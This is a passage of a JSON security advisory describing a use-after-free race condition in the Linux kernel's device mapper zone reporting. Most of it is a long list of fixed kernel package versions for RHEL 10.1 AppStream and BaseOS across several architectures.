"text": "A flaw was found in the Linux kernel\u0027s device mapper (dm) component. When setting up zone append emulation resources, a race condition can occur if the `blk_revalidate_disk_zones()` function fails while another process simultaneously calls `dm_blk_report_zones()`. This timing issue can lead to a use-after-free error, potentially allowing a local attacker to achieve privilege escalation or cause a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "kernel: Linux kernel: Use-after-free in device mapper due to race condition in zone reporting",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"AppStream-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"AppStream-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"BaseOS-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"BaseOS-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"BaseOS-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"BaseOS-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
